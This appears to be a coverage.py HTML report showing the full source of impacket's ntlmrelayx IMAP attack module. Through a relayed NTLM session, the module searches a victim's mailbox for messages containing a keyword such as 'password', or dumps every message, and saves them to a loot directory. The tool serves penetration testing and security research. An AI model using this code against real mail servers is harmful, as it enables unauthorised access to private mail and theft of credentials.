


<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    
    
    <meta http-equiv="X-UA-Compatible" content="IE=emulateIE7" />
    <title>Coverage for /private/tmp/im/impacket/impacket/examples/ntlmrelayx/attacks/imapattack.py: 12%</title>
    <link rel="stylesheet" href="style.css" type="text/css">
    
    <script type="text/javascript" src="jquery.min.js"></script>
    <script type="text/javascript" src="jquery.hotkeys.js"></script>
    <script type="text/javascript" src="jquery.isonscreen.js"></script>
    <script type="text/javascript" src="coverage_html.js"></script>
    <script type="text/javascript">
        jQuery(document).ready(coverage.pyfile_ready);
    </script>
</head>
<body class="pyfile">

<div id="header">
    <div class="content">
        <h1>Coverage for <b>/private/tmp/im/impacket/impacket/examples/ntlmrelayx/attacks/imapattack.py</b> :
            <span class="pc_cov">12%</span>
        </h1>

        <img id="keyboard_icon" src="keybd_closed.png" alt="Show keyboard shortcuts" />

        <h2 class="stats">
            46 statements &nbsp;
            <span class="run hide_run shortkey_r button_toggle_run">8 run</span>
            <span class="mis shortkey_m button_toggle_mis">38 missing</span>
            <span class="exc shortkey_x button_toggle_exc">0 excluded</span>

            
                <span class="par run hide_run shortkey_p button_toggle_par">0 partial</span>
            
        </h2>
    </div>
</div>

<div class="help_panel">
    <img id="panel_icon" src="keybd_open.png" alt="Hide keyboard shortcuts" />
    <p class="legend">Hot-keys on this page</p>
    <div>
    <p class="keyhelp">
        <span class="key">r</span>
        <span class="key">m</span>
        <span class="key">x</span>
        <span class="key">p</span> &nbsp; toggle line displays
    </p>
    <p class="keyhelp">
        <span class="key">j</span>
        <span class="key">k</span> &nbsp; next/prev highlighted chunk
    </p>
    <p class="keyhelp">
        <span class="key">0</span> &nbsp; (zero) top of page
    </p>
    <p class="keyhelp">
        <span class="key">1</span> &nbsp; (one) first highlighted chunk
    </p>
    </div>
</div>

<div id="source">
    <table>
        <tr>
            <td class="linenos">
<p id="n1" class="pln"><a href="#n1">1</a></p>
<p id="n2" class="pln"><a href="#n2">2</a></p>
<p id="n3" class="pln"><a href="#n3">3</a></p>
<p id="n4" class="pln"><a href="#n4">4</a></p>
<p id="n5" class="pln"><a href="#n5">5</a></p>
<p id="n6" class="pln"><a href="#n6">6</a></p>
<p id="n7" class="pln"><a href="#n7">7</a></p>
<p id="n8" class="pln"><a href="#n8">8</a></p>
<p id="n9" class="pln"><a href="#n9">9</a></p>
<p id="n10" class="pln"><a href="#n10">10</a></p>
<p id="n11" class="pln"><a href="#n11">11</a></p>
<p id="n12" class="pln"><a href="#n12">12</a></p>
<p id="n13" class="pln"><a href="#n13">13</a></p>
<p id="n14" class="pln"><a href="#n14">14</a></p>
<p id="n15" class="pln"><a href="#n15">15</a></p>
<p id="n16" class="pln"><a href="#n16">16</a></p>
<p id="n17" class="pln"><a href="#n17">17</a></p>
<p id="n18" class="stm run hide_run"><a href="#n18">18</a></p>
<p id="n19" class="stm run hide_run"><a href="#n19">19</a></p>
<p id="n20" class="stm run hide_run"><a href="#n20">20</a></p>
<p id="n21" class="stm run hide_run"><a href="#n21">21</a></p>
<p id="n22" class="pln"><a href="#n22">22</a></p>
<p id="n23" class="stm run hide_run"><a href="#n23">23</a></p>
<p id="n24" class="pln"><a href="#n24">24</a></p>
<p id="n25" class="stm run hide_run"><a href="#n25">25</a></p>
<p id="n26" class="pln"><a href="#n26">26</a></p>
<p id="n27" class="pln"><a href="#n27">27</a></p>
<p id="n28" class="pln"><a href="#n28">28</a></p>
<p id="n29" class="pln"><a href="#n29">29</a></p>
<p id="n30" class="pln"><a href="#n30">30</a></p>
<p id="n31" class="stm run hide_run"><a href="#n31">31</a></p>
<p id="n32" class="stm run hide_run"><a href="#n32">32</a></p>
<p id="n33" class="pln"><a href="#n33">33</a></p>
<p id="n34" class="stm mis"><a href="#n34">34</a></p>
<p id="n35" class="stm mis"><a href="#n35">35</a></p>
<p id="n36" class="stm mis"><a href="#n36">36</a></p>
<p id="n37" class="stm mis"><a href="#n37">37</a></p>
<p id="n38" class="stm mis"><a href="#n38">38</a></p>
<p id="n39" class="stm mis"><a href="#n39">39</a></p>
<p id="n40" class="stm mis"><a href="#n40">40</a></p>
<p id="n41" class="stm mis"><a href="#n41">41</a></p>
<p id="n42" class="stm mis"><a href="#n42">42</a></p>
<p id="n43" class="pln"><a href="#n43">43</a></p>
<p id="n44" class="stm mis"><a href="#n44">44</a></p>
<p id="n45" class="stm mis"><a href="#n45">45</a></p>
<p id="n46" class="pln"><a href="#n46">46</a></p>
<p id="n47" class="stm mis"><a href="#n47">47</a></p>
<p id="n48" class="stm mis"><a href="#n48">48</a></p>
<p id="n49" class="stm mis"><a href="#n49">49</a></p>
<p id="n50" class="stm mis"><a href="#n50">50</a></p>
<p id="n51" class="pln"><a href="#n51">51</a></p>
<p id="n52" class="stm mis"><a href="#n52">52</a></p>
<p id="n53" class="stm mis"><a href="#n53">53</a></p>
<p id="n54" class="stm mis"><a href="#n54">54</a></p>
<p id="n55" class="stm mis"><a href="#n55">55</a></p>
<p id="n56" class="pln"><a href="#n56">56</a></p>
<p id="n57" class="pln"><a href="#n57">57</a></p>
<p id="n58" class="stm mis"><a href="#n58">58</a></p>
<p id="n59" class="stm mis"><a href="#n59">59</a></p>
<p id="n60" class="pln"><a href="#n60">60</a></p>
<p id="n61" class="stm mis"><a href="#n61">61</a></p>
<p id="n62" class="pln"><a href="#n62">62</a></p>
<p id="n63" class="stm mis"><a href="#n63">63</a></p>
<p id="n64" class="stm mis"><a href="#n64">64</a></p>
<p id="n65" class="stm mis"><a href="#n65">65</a></p>
<p id="n66" class="pln"><a href="#n66">66</a></p>
<p id="n67" class="stm mis"><a href="#n67">67</a></p>
<p id="n68" class="stm mis"><a href="#n68">68</a></p>
<p id="n69" class="pln"><a href="#n69">69</a></p>
<p id="n70" class="stm mis"><a href="#n70">70</a></p>
<p id="n71" class="stm mis"><a href="#n71">71</a></p>
<p id="n72" class="stm mis"><a href="#n72">72</a></p>
<p id="n73" class="stm mis"><a href="#n73">73</a></p>
<p id="n74" class="pln"><a href="#n74">74</a></p>
<p id="n75" class="pln"><a href="#n75">75</a></p>
<p id="n76" class="stm mis"><a href="#n76">76</a></p>
<p id="n77" class="stm mis"><a href="#n77">77</a></p>
<p id="n78" class="pln"><a href="#n78">78</a></p>
<p id="n79" class="pln"><a href="#n79">79</a></p>
<p id="n80" class="stm mis"><a href="#n80">80</a></p>
<p id="n81" class="pln"><a href="#n81">81</a></p>
<p id="n82" class="pln"><a href="#n82">82</a></p>
<p id="n83" class="stm mis"><a href="#n83">83</a></p>
<p id="n84" class="stm mis"><a href="#n84">84</a></p>
<p id="n85" class="stm mis"><a href="#n85">85</a></p>
<p id="n86" class="pln"><a href="#n86">86</a></p>
<p id="n87" class="pln"><a href="#n87">87</a></p>
<p id="n88" class="stm mis"><a href="#n88">88</a></p>

            </td>
            <td class="text">
<p id="t1" class="pln"><span class="com"># SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.</span><span class="strut">&nbsp;</span></p>
<p id="t2" class="pln"><span class="com">#</span><span class="strut">&nbsp;</span></p>
<p id="t3" class="pln"><span class="com"># This software is provided under under a slightly modified version</span><span class="strut">&nbsp;</span></p>
<p id="t4" class="pln"><span class="com"># of the Apache Software License. See the accompanying LICENSE file</span><span class="strut">&nbsp;</span></p>
<p id="t5" class="pln"><span class="com"># for more information.</span><span class="strut">&nbsp;</span></p>
<p id="t6" class="pln"><span class="com">#</span><span class="strut">&nbsp;</span></p>
<p id="t7" class="pln"><span class="com"># IMAP Attack Class</span><span class="strut">&nbsp;</span></p>
<p id="t8" class="pln"><span class="com">#</span><span class="strut">&nbsp;</span></p>
<p id="t9" class="pln"><span class="com"># Authors:</span><span class="strut">&nbsp;</span></p>
<p id="t10" class="pln"><span class="com">#  Alberto Solino (@agsolino)</span><span class="strut">&nbsp;</span></p>
<p id="t11" class="pln"><span class="com">#  Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)</span><span class="strut">&nbsp;</span></p>
<p id="t12" class="pln"><span class="com">#</span><span class="strut">&nbsp;</span></p>
<p id="t13" class="pln"><span class="com"># Description:</span><span class="strut">&nbsp;</span></p>
<p id="t14" class="pln"><span class="com">#  IMAP protocol relay attack</span><span class="strut">&nbsp;</span></p>
<p id="t15" class="pln"><span class="com">#</span><span class="strut">&nbsp;</span></p>
<p id="t16" class="pln"><span class="com"># ToDo:</span><span class="strut">&nbsp;</span></p>
<p id="t17" class="pln"><span class="com">#</span><span class="strut">&nbsp;</span></p>
<p id="t18" class="stm run hide_run"><span class="key">import</span> <span class="nam">re</span><span class="strut">&nbsp;</span></p>
<p id="t19" class="stm run hide_run"><span class="key">import</span> <span class="nam">os</span><span class="strut">&nbsp;</span></p>
<p id="t20" class="stm run hide_run"><span class="key">from</span> <span class="nam">impacket</span> <span class="key">import</span> <span class="nam">LOG</span><span class="strut">&nbsp;</span></p>
<p id="t21" class="stm run hide_run"><span class="key">from</span> <span class="nam">impacket</span><span class="op">.</span><span class="nam">examples</span><span class="op">.</span><span class="nam">ntlmrelayx</span><span class="op">.</span><span class="nam">attacks</span> <span class="key">import</span> <span class="nam">ProtocolAttack</span><span class="strut">&nbsp;</span></p>
<p id="t22" class="pln"><span class="strut">&nbsp;</span></p>
<p id="t23" class="stm run hide_run"><span class="nam">PROTOCOL_ATTACK_CLASS</span> <span class="op">=</span> <span class="str">"IMAPAttack"</span><span class="strut">&nbsp;</span></p>
<p id="t24" class="pln"><span class="strut">&nbsp;</span></p>
<p id="t25" class="stm run hide_run"><span class="key">class</span> <span class="nam">IMAPAttack</span><span class="op">(</span><span class="nam">ProtocolAttack</span><span class="op">)</span><span class="op">:</span><span class="strut">&nbsp;</span></p>
<p id="t26" class="pln">    <span class="str">"""</span><span class="strut">&nbsp;</span></p>
<p id="t27" class="pln"><span class="str">    This is the default IMAP(s) attack. By default it searches the INBOX imap folder</span><span class="strut">&nbsp;</span></p>
<p id="t28" class="pln"><span class="str">    for messages with "password" in the header or body. Alternate keywords can be specified</span><span class="strut">&nbsp;</span></p>
<p id="t29" class="pln"><span class="str">    on the command line. For more advanced attacks, consider using the SOCKS feature.</span><span class="strut">&nbsp;</span></p>
<p id="t30" class="pln"><span class="str">    """</span><span class="strut">&nbsp;</span></p>
<p id="t31" class="stm run hide_run">    <span class="nam">PLUGIN_NAMES</span> <span class="op">=</span> <span class="op">[</span><span class="str">"IMAP"</span><span class="op">,</span> <span class="str">"IMAPS"</span><span class="op">]</span><span class="strut">&nbsp;</span></p>
<p id="t32" class="stm run hide_run">    <span class="key">def</span> <span class="nam">run</span><span class="op">(</span><span class="nam">self</span><span class="op">)</span><span class="op">:</span><span class="strut">&nbsp;</span></p>
<p id="t33" class="pln">        <span class="com">#Default action: Search the INBOX</span><span class="strut">&nbsp;</span></p>
<p id="t34" class="stm mis">        <span class="nam">targetBox</span> <span class="op">=</span> <span class="nam">self</span><span class="op">.</span><span class="nam">config</span><span class="op">.</span><span class="nam">mailbox</span><span class="strut">&nbsp;</span></p>
<p id="t35" class="stm mis">        <span class="nam">result</span><span class="op">,</span> <span class="nam">data</span> <span class="op">=</span> <span class="nam">self</span><span class="op">.</span><span class="nam">client</span><span class="op">.</span><span class="nam">select</span><span class="op">(</span><span class="nam">targetBox</span><span class="op">,</span><span class="key">True</span><span class="op">)</span> <span class="com">#True indicates readonly</span><span class="strut">&nbsp;</span></p>
<p id="t36" class="stm mis">        <span class="key">if</span> <span class="nam">result</span> <span class="op">!=</span> <span class="str">'OK'</span><span class="op">:</span><span class="strut">&nbsp;</span></p>
<p id="t37" class="stm mis">            <span class="nam">LOG</span><span class="op">.</span><span class="nam">error</span><span class="op">(</span><span class="str">'Could not open mailbox %s: %s'</span> <span class="op">%</span> <span class="op">(</span><span class="nam">targetBox</span><span class="op">,</span> <span class="nam">data</span><span class="op">)</span><span class="op">)</span><span class="strut">&nbsp;</span></p>
<p id="t38" class="stm mis">            <span class="nam">LOG</span><span class="op">.</span><span class="nam">info</span><span class="op">(</span><span class="str">'Opening mailbox INBOX'</span><span class="op">)</span><span class="strut">&nbsp;</span></p>
<p id="t39" class="stm mis">            <span class="nam">targetBox</span> <span class="op">=</span> <span class="str">'INBOX'</span><span class="strut">&nbsp;</span></p>
<p id="t40" class="stm mis">            <span class="nam">result</span><span class="op">,</span> <span class="nam">data</span> <span class="op">=</span> <span class="nam">self</span><span class="op">.</span><span class="nam">client</span><span class="op">.</span><span class="nam">select</span><span class="op">(</span><span class="nam">targetBox</span><span class="op">,</span><span class="key">True</span><span class="op">)</span> <span class="com">#True indicates readonly</span><span class="strut">&nbsp;</span></p>
<p id="t41" class="stm mis">        <span class="nam">inboxCount</span> <span class="op">=</span> <span class="nam">int</span><span class="op">(</span><span class="nam">data</span><span class="op">[</span><span class="num">0</span><span class="op">]</span><span class="op">)</span><span class="strut">&nbsp;</span></p>
<p id="t42" class="stm mis">        <span class="nam">LOG</span><span class="op">.</span><span class="nam">info</span><span class="op">(</span><span class="str">'Found %s messages in mailbox %s'</span> <span class="op">%</span> <span class="op">(</span><span class="nam">inboxCount</span><span class="op">,</span> <span class="nam">targetBox</span><span class="op">)</span><span class="op">)</span><span class="strut">&nbsp;</span></p>
<p id="t43" class="pln">        <span class="com">#If we should not dump all, search for the keyword</span><span class="strut">&nbsp;</span></p>
<p id="t44" class="stm mis">        <span class="key">if</span> <span class="key">not</span> <span class="nam">self</span><span class="op">.</span><span class="nam">config</span><span class="op">.</span><span class="nam">dump_all</span><span class="op">:</span><span class="strut">&nbsp;</span></p>
<p id="t45" class="stm mis">            <span class="nam">result</span><span class="op">,</span> <span class="nam">rawdata</span> <span class="op">=</span> <span class="nam">self</span><span class="op">.</span><span class="nam">client</span><span class="op">.</span><span class="nam">search</span><span class="op">(</span><span class="key">None</span><span class="op">,</span> <span class="str">'OR'</span><span class="op">,</span> <span class="str">'SUBJECT'</span><span class="op">,</span> <span class="str">'"%s"'</span> <span class="op">%</span> <span class="nam">self</span><span class="op">.</span><span class="nam">config</span><span class="op">.</span><span class="nam">keyword</span><span class="op">,</span> <span class="str">'BODY'</span><span class="op">,</span> <span class="str">'"%s"'</span> <span class="op">%</span> <span class="nam">self</span><span class="op">.</span><span class="nam">config</span><span class="op">.</span><span class="nam">keyword</span><span class="op">)</span><span class="strut">&nbsp;</span></p>
<p id="t46" class="pln">            <span class="com">#Check if search worked</span><span class="strut">&nbsp;</span></p>
<p id="t47" class="stm mis">            <span class="key">if</span> <span class="nam">result</span> <span class="op">!=</span> <span class="str">'OK'</span><span class="op">:</span><span class="strut">&nbsp;</span></p>
<p id="t48" class="stm mis">                <span class="nam">LOG</span><span class="op">.</span><span class="nam">error</span><span class="op">(</span><span class="str">'Search failed: %s'</span> <span class="op">%</span> <span class="nam">rawdata</span><span class="op">)</span><span class="strut">&nbsp;</span></p>
<p id="t49" class="stm mis">                <span class="key">return</span><span class="strut">&nbsp;</span></p>
<p id="t50" class="stm mis">            <span class="nam">dumpMessages</span> <span class="op">=</span> <span class="op">[</span><span class="op">]</span><span class="strut">&nbsp;</span></p>
<p id="t51" class="pln">            <span class="com">#message IDs are separated by spaces</span><span class="strut">&nbsp;</span></p>
<p id="t52" class="stm mis">            <span class="key">for</span> <span class="nam">msgs</span> <span class="key">in</span> <span class="nam">rawdata</span><span class="op">:</span><span class="strut">&nbsp;</span></p>
<p id="t53" class="stm mis">                <span class="nam">dumpMessages</span> <span class="op">+=</span> <span class="nam">msgs</span><span class="op">.</span><span class="nam">split</span><span class="op">(</span><span class="str">' '</span><span class="op">)</span><span class="strut">&nbsp;</span></p>
<p id="t54" class="stm mis">            <span class="key">if</span> <span class="nam">self</span><span class="op">.</span><span class="nam">config</span><span class="op">.</span><span class="nam">dump_max</span> <span class="op">!=</span> <span class="num">0</span> <span class="key">and</span> <span class="nam">len</span><span class="op">(</span><span class="nam">dumpMessages</span><span class="op">)</span> <span class="op">></span> <span class="nam">self</span><span class="op">.</span><span class="nam">config</span><span class="op">.</span><span class="nam">dump_max</span><span class="op">:</span><span class="strut">&nbsp;</span></p>
<p id="t55" class="stm mis">                <span class="nam">dumpMessages</span> <span class="op">=</span> <span class="nam">dumpMessages</span><span class="op">[</span><span class="op">:</span><span class="nam">self</span><span class="op">.</span><span class="nam">config</span><span class="op">.</span><span class="nam">dump_max</span><span class="op">]</span><span class="strut">&nbsp;</span></p>
<p id="t56" class="pln">        <span class="key">else</span><span class="op">:</span><span class="strut">&nbsp;</span></p>
<p id="t57" class="pln">            <span class="com">#Dump all mails, up to the maximum number configured</span><span class="strut">&nbsp;</span></p>
<p id="t58" class="stm mis">            <span class="key">if</span> <span class="nam">self</span><span class="op">.</span><span class="nam">config</span><span class="op">.</span><span class="nam">dump_max</span> <span class="op">==</span> <span class="num">0</span> <span class="key">or</span> <span class="nam">self</span><span class="op">.</span><span class="nam">config</span><span class="op">.</span><span class="nam">dump_max</span> <span class="op">></span> <span class="nam">inboxCount</span><span class="op">:</span><span class="strut">&nbsp;</span></p>
<p id="t59" class="stm mis">                <span class="nam">dumpMessages</span> <span class="op">=</span> <span class="nam">list</span><span class="op">(</span><span class="nam">range</span><span class="op">(</span><span class="num">1</span><span class="op">,</span> <span class="nam">inboxCount</span><span class="op">+</span><span class="num">1</span><span class="op">)</span><span class="op">)</span><span class="strut">&nbsp;</span></p>
<p id="t60" class="pln">            <span class="key">else</span><span class="op">:</span><span class="strut">&nbsp;</span></p>
<p id="t61" class="stm mis">                <span class="nam">dumpMessages</span> <span class="op">=</span> <span class="nam">list</span><span class="op">(</span><span class="nam">range</span><span class="op">(</span><span class="num">1</span><span class="op">,</span> <span class="nam">self</span><span class="op">.</span><span class="nam">config</span><span class="op">.</span><span class="nam">dump_max</span><span class="op">+</span><span class="num">1</span><span class="op">)</span><span class="op">)</span><span class="strut">&nbsp;</span></p>
<p id="t62" class="pln"><span class="strut">&nbsp;</span></p>
<p id="t63" class="stm mis">        <span class="nam">numMsgs</span> <span class="op">=</span> <span class="nam">len</span><span class="op">(</span><span class="nam">dumpMessages</span><span class="op">)</span><span class="strut">&nbsp;</span></p>
<p id="t64" class="stm mis">        <span class="key">if</span> <span class="nam">numMsgs</span> <span class="op">==</span> <span class="num">0</span><span class="op">:</span><span class="strut">&nbsp;</span></p>
<p id="t65" class="stm mis">            <span class="nam">LOG</span><span class="op">.</span><span class="nam">info</span><span class="op">(</span><span class="str">'No messages were found containing the search keywords'</span><span class="op">)</span><span class="strut">&nbsp;</span></p>
<p id="t66" class="pln">        <span class="key">else</span><span class="op">:</span><span class="strut">&nbsp;</span></p>
<p id="t67" class="stm mis">            <span class="nam">LOG</span><span class="op">.</span><span class="nam">info</span><span class="op">(</span><span class="str">'Dumping %d messages found by search for "%s"'</span> <span class="op">%</span> <span class="op">(</span><span class="nam">numMsgs</span><span class="op">,</span> <span class="nam">self</span><span class="op">.</span><span class="nam">config</span><span class="op">.</span><span class="nam">keyword</span><span class="op">)</span><span class="op">)</span><span class="strut">&nbsp;</span></p>
<p id="t68" class="stm mis">            <span class="key">for</span> <span class="nam">i</span><span class="op">,</span> <span class="nam">msgIndex</span> <span class="key">in</span> <span class="nam">enumerate</span><span class="op">(</span><span class="nam">dumpMessages</span><span class="op">)</span><span class="op">:</span><span class="strut">&nbsp;</span></p>
<p id="t69" class="pln">                <span class="com">#Fetch the message</span><span class="strut">&nbsp;</span></p>
<p id="t70" class="stm mis">                <span class="nam">result</span><span class="op">,</span> <span class="nam">rawMessage</span> <span class="op">=</span> <span class="nam">self</span><span class="op">.</span><span class="nam">client</span><span class="op">.</span><span class="nam">fetch</span><span class="op">(</span><span class="nam">msgIndex</span><span class="op">,</span> <span class="str">'(RFC822)'</span><span class="op">)</span><span class="strut">&nbsp;</span></p>
<p id="t71" class="stm mis">                <span class="key">if</span> <span class="nam">result</span> <span class="op">!=</span> <span class="str">'OK'</span><span class="op">:</span><span class="strut">&nbsp;</span></p>
<p id="t72" class="stm mis">                    <span class="nam">LOG</span><span class="op">.</span><span class="nam">error</span><span class="op">(</span><span class="str">'Could not fetch message with index %s: %s'</span> <span class="op">%</span> <span class="op">(</span><span class="nam">msgIndex</span><span class="op">,</span> <span class="nam">rawMessage</span><span class="op">)</span><span class="op">)</span><span class="strut">&nbsp;</span></p>
<p id="t73" class="stm mis">                    <span class="key">continue</span><span class="strut">&nbsp;</span></p>
<p id="t74" class="pln"><span class="strut">&nbsp;</span></p>
<p id="t75" class="pln">                <span class="com">#Replace any special chars in the mailbox name and username</span><span class="strut">&nbsp;</span></p>
<p id="t76" class="stm mis">                <span class="nam">mailboxName</span> <span class="op">=</span> <span class="nam">re</span><span class="op">.</span><span class="nam">sub</span><span class="op">(</span><span class="str">r'[^a-zA-Z0-9_\-\.]+'</span><span class="op">,</span> <span class="str">'_'</span><span class="op">,</span> <span class="nam">targetBox</span><span class="op">)</span><span class="strut">&nbsp;</span></p>
<p id="t77" class="stm mis">                <span class="nam">textUserName</span> <span class="op">=</span> <span class="nam">re</span><span class="op">.</span><span class="nam">sub</span><span class="op">(</span><span class="str">r'[^a-zA-Z0-9_\-\.]+'</span><span class="op">,</span> <span class="str">'_'</span><span class="op">,</span> <span class="nam">self</span><span class="op">.</span><span class="nam">username</span><span class="op">)</span><span class="strut">&nbsp;</span></p>
<p id="t78" class="pln"><span class="strut">&nbsp;</span></p>
<p id="t79" class="pln">                <span class="com">#Combine username with mailboxname and mail number</span><span class="strut">&nbsp;</span></p>
<p id="t80" class="stm mis">                <span class="nam">fileName</span> <span class="op">=</span> <span class="str">'mail_'</span> <span class="op">+</span> <span class="nam">textUserName</span> <span class="op">+</span> <span class="str">'-'</span> <span class="op">+</span> <span class="nam">mailboxName</span> <span class="op">+</span> <span class="str">'_'</span> <span class="op">+</span> <span class="nam">str</span><span class="op">(</span><span class="nam">msgIndex</span><span class="op">)</span> <span class="op">+</span> <span class="str">'.eml'</span><span class="strut">&nbsp;</span></p>
<p id="t81" class="pln"><span class="strut">&nbsp;</span></p>
<p id="t82" class="pln">                <span class="com">#Write it to the file</span><span class="strut">&nbsp;</span></p>
<p id="t83" class="stm mis">                <span class="key">with</span> <span class="nam">open</span><span class="op">(</span><span class="nam">os</span><span class="op">.</span><span class="nam">path</span><span class="op">.</span><span class="nam">join</span><span class="op">(</span><span class="nam">self</span><span class="op">.</span><span class="nam">config</span><span class="op">.</span><span class="nam">lootdir</span><span class="op">,</span><span class="nam">fileName</span><span class="op">)</span><span class="op">,</span><span class="str">'w'</span><span class="op">)</span> <span class="key">as</span> <span class="nam">of</span><span class="op">:</span><span class="strut">&nbsp;</span></p>
<p id="t84" class="stm mis">                    <span class="nam">of</span><span class="op">.</span><span class="nam">write</span><span class="op">(</span><span class="nam">rawMessage</span><span class="op">[</span><span class="num">0</span><span class="op">]</span><span class="op">[</span><span class="num">1</span><span class="op">]</span><span class="op">)</span><span class="strut">&nbsp;</span></p>
<p id="t85" class="stm mis">                <span class="nam">LOG</span><span class="op">.</span><span class="nam">info</span><span class="op">(</span><span class="str">'Done fetching message %d/%d'</span> <span class="op">%</span> <span class="op">(</span><span class="nam">i</span><span class="op">+</span><span class="num">1</span><span class="op">,</span><span class="nam">numMsgs</span><span class="op">)</span><span class="op">)</span><span class="strut">&nbsp;</span></p>
<p id="t86" class="pln"><span class="strut">&nbsp;</span></p>
<p id="t87" class="pln">        <span class="com">#Close connection cleanly</span><span class="strut">&nbsp;</span></p>
<p id="t88" class="stm mis">        <span class="nam">self</span><span class="op">.</span><span class="nam">client</span><span class="op">.</span><span class="nam">logout</span><span class="op">(</span><span class="op">)</span><span class="strut">&nbsp;</span></p>

            </td>
        </tr>
    </table>
</div>

<div id="footer">
    <div class="content">
        <p>
            <a class="nav" href="index.html">&#xab; index</a> &nbsp; &nbsp; <a class="nav" href="https://coverage.readthedocs.io">coverage.py v4.5.4</a>,
            created at 2019-09-25 12:47
        </p>
    </div>
</div>

</body>
</html>
